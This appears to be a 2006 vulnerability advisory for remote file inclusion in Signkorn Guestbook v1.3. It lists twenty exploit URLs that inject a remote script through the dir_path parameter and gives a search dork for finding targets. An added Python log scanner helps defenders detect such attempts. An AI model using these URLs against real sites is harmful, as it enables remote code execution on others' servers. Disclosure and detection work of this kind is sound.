Signkorn Guestbook <= v1.3 Multiple Remote File Include Vulnerabilities

2006.09.23
Credit: ThE__LeO
Risk: High
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 5.1/10
Impact Subscore: 6.4/10
Exploitability Subscore: 4.9/10
Exploit range: Remote
Attack complexity: High
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Signkorn Guestbook <= v1.3 Multiple Remote File Include Vulnerabilities
# Discovered By : ThE__LeO ;
# Software : Signkorn Guestbook v 1.3 ;
# Dork : "Signkorn Guestbook 1.3" & "Signkorn Guestbook 1.1 " Signkorn Guestbook 1.2"
# Exploit :
http://Www.Example.Com/[Script]/index.php?dir_path=[U r Evil Script] ;
http://Www.Example.Com/[Script]/includes/functions.gb.php?dir_path=[U r Evil Script] ;
http://Www.Example.Com/[Script]/includes/functions.admin.php?dir_path=[U r Evil Script] ;
http://Www.Example.Com/[Script]/includes/admin.inc.php?dir_path=[U r Evil Script] ;
http://Www.Example.Com/[Script]/help.php?dir_path=[U r Evil Script] ;
http://Www.Example.Com/[Script]/smile.php?dir_path=[U r Evil Script] ;
http://Www.Example.Com/[Script]/help/en/adminhelp0.php?dir_path=[U r Evil Script] ;
http://Www.Example.Com/[Script]/help/en/adminhelp1.php?dir_path=[U r Evil Script] ;
http://Www.Example.Com/[Script]/help/en/adminhelp2.php?dir_path=[U r Evil Script] ;
http://Www.Example.Com/[Script]/help/en/adminhelp3.php?dir_path=[U r Evil Script] ;
http://Www.Example.Com/[Script]/help/de/adminhelp0.php?dir_path=[U r Evil Script] ;
http://Www.Example.Com/[Script]/help/de/adminhelp1.php?dir_path=[U r Evil Script] ;
http://Www.Example.Com/[Script]/help/de/adminhelp2.php?dir_path=[U r Evil Script] ;
http://Www.Example.Com/[Script]/help/de/adminhelp3.php?dir_path=[U r Evil Script] ;
http://Www.Example.Com/[Script]/entry.php?dir_path=[U r Evil Script] ;
http://Www.Example.Com/[Script]/admin/preview.php?dir_path=[U r Evil Script] ;
http://Www.Example.Com/[Script]/admin/log.php?dir_path=[U r Evil Script] ;
http://Www.Example.Com/[Script]/admin/index.php?dir_path=[U r Evil Script] ;
http://Www.Example.Com/[Script]/admin/config.php?dir_path=[U r Evil Script] ;
http://Www.Example.Com/[Script]/admin/admin.php?dir_path=[U r Evil Script] ;
# Greetz : M.I.D.T[DrackanZ, Mr.IlysS, NeThug47],Arabian-FighterZ, lhma9, Death & All Moroccan & Arab Hackers ;
# Safi Braka yallah Tla7 ;)
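For defenders checking whether an installation was probed through the `dir_path` parameter listed above, here is a log check, added as an example and not part of the original advisory. It assumes combined-format web server access logs; the `/gb/` install path, the hosts and the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request line inside a combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A value beginning with a URI scheme, "//" or a UNC prefix points the
# include outside the application's own directory tree.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*:|//|\\\\)', re.I)

def remote_include_attempt(log_line, param="dir_path"):
    """Return the decoded parameter value if it names a remote target, else None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    query = urlsplit(m.group(1)).query
    for value in parse_qs(query, keep_blank_values=True).get(param, []):
        # parse_qs decodes once; decode again to catch double-encoded values.
        decoded = unquote(value)
        if REMOTE_RE.match(decoded):
            return decoded
    return None

def scan(lines):
    """Return (line_index, decoded_value) for every flagged log line."""
    hits = []
    for i, line in enumerate(lines):
        value = remote_include_attempt(line)
        if value is not None:
            hits.append((i, value))
    return hits

# Constructed sample log lines (documentation addresses and hosts).
SAMPLE_LOG = [
    '203.0.113.7 - - [23/Sep/2006:10:01:02 +0000] "GET /gb/index.php'
    '?dir_path=http://files.example.net/x.txt? HTTP/1.1" 200 512 "-" "-"',
    '192.0.2.10 - - [23/Sep/2006:10:01:05 +0000] "GET /gb/index.php'
    '?page=2 HTTP/1.1" 200 4096 "-" "-"',
    '203.0.113.7 - - [23/Sep/2006:10:01:09 +0000] "GET /gb/includes/functions.gb.php'
    '?dir_path=http%253A%252F%252Ffiles.example.net%252Fx.txt HTTP/1.1" 200 0 "-" "-"',
    '192.0.2.10 - - [23/Sep/2006:10:02:00 +0000] "GET /gb/help.php'
    '?dir_path=./ HTTP/1.1" 200 2048 "-" "-"',
]

if __name__ == "__main__":
    for index, value in scan(SAMPLE_LOG):
        print(f"line {index}: dir_path -> {value}")
```

A match records an attempt only; whether the include actually ran depends on the host's PHP configuration, which the access log does not show.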


Copyright 2022, cxsecurity.com

 
